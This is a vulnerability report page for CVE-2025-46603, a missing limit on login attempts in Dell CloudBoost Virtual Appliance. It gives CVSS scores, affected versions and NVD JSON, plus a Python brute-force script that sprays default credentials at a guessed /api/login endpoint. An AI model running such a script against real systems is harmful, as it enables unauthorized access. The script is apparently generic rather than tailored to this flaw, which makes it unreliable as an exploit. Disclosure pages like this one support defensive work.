Security Vulnerability Report
CVE-2025-46603 CVSS 7.0 HIGH

Published: 2025-12-05 19:15:48
Last Modified: 2026-01-16 21:18:15

Description

Dell CloudBoost Virtual Appliance, versions 19.13.0.0 and prior, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.

CVSS Details

CVSS Score: 7.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:cloudboost_virtual_appliance:*:*:*:*:*:*:*:* - VULNERABLE
Dell CloudBoost Virtual Appliance <= 19.13.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46603 PoC - Dell CloudBoost Authentication Bypass
# Note: This is a conceptual PoC for educational and security testing purposes only
# Unauthorized access to systems is illegal
import requests
import sys
from concurrent.futures import ThreadPoolExecutor

TARGET_HOST = "https://target-cloudboost-host"
DEFAULT_PORTS = [443, 8443]
COMMON_CREDENTIALS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("admin", "123456"),
    ("admin", "Dell123"),
    ("administrator", "administrator"),
    ("root", "root"),
    ("root", "calvin")
]


def test_authentication(host, port, username, password):
    """Test authentication endpoint with given credentials"""
    try:
        url = f"{host}:{port}/api/login"
        data = {"username": username, "password": password}
        response = requests.post(url, json=data, timeout=10, verify=False)
        if response.status_code == 200 and "token" in response.text:
            print(f"[SUCCESS] Valid credentials found: {username}:{password}")
            return True
        return False
    except Exception as e:
        print(f"[ERROR] {e}")
        return False


def brute_force_attack(host, max_threads=10):
    """Brute force attack - demonstrates lack of rate limiting"""
    print(f"[*] Starting brute force attack against {host}")
    print(f"[*] Testing {len(COMMON_CREDENTIALS)} credential pairs")
    tasks = []
    for port in DEFAULT_PORTS:
        for username, password in COMMON_CREDENTIALS:
            tasks.append((host, port, username, password))
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        results = executor.map(lambda t: test_authentication(*t), tasks)
        if any(results):
            print("[!] Authentication bypass successful - rate limiting not enforced")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        brute_force_attack(sys.argv[1])
    else:
        print("Usage: python cve-2025-46603-poc.py <target_host>")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46603", "sourceIdentifier": "[email protected]", "published": "2025-12-05T19:15:48.233", "lastModified": "2026-01-16T21:18:14.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell CloudBoost Virtual Appliance, versions 19.13.0.0 and prior, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access."}, {"lang": "es", "value": "Dell CloudBoost Virtual Appliance, versiones 19.13.0.0 y anteriores, contiene una vulnerabilidad de Restricción Inadecuada de Intentos Excesivos de Autenticación. Un atacante no autenticado con acceso remoto podría potencialmente explotar esta vulnerabilidad, lo que llevaría a un acceso no autorizado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, 
"cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:cloudboost_virtual_appliance:*:*:*:*:*:*:*:*", "versionEndExcluding": "19.13.0.2", "matchCriteriaId": "FBA69D9C-69D7-4516-B176-32E6C9D2B756"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000397417/dsa-2025-387-security-update-for-dell-cloudboost-virtual-appliance-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}